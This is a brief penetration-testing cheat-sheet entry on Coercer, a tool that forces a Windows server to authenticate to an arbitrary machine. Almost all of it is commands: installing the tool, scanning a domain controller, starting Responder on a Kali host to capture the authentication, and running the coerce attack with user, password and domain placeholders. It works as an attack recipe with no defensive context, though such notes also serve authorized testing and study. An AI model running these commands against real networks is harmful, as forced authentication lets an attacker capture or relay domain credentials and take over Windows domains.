A python script to automatically coerce (force) a Windows server to authenticate on an arbitrary machine through many methods.
- Coercer (GitHub)
Installation
sudo pip3 install coercer
Help
Coercer -h
Coercer scan -h
Coercer coerce -h
Coercer fuzz -h
Scan
Coercer scan -t $DC_IP
Coerce
Listener must be started on Kali, use Responder.
sudo -E responder -I eth0 --lm
Coercer coerce -l $KALI_IP -t $DC_IP -u $USER -p $PASS -d $DOMAIN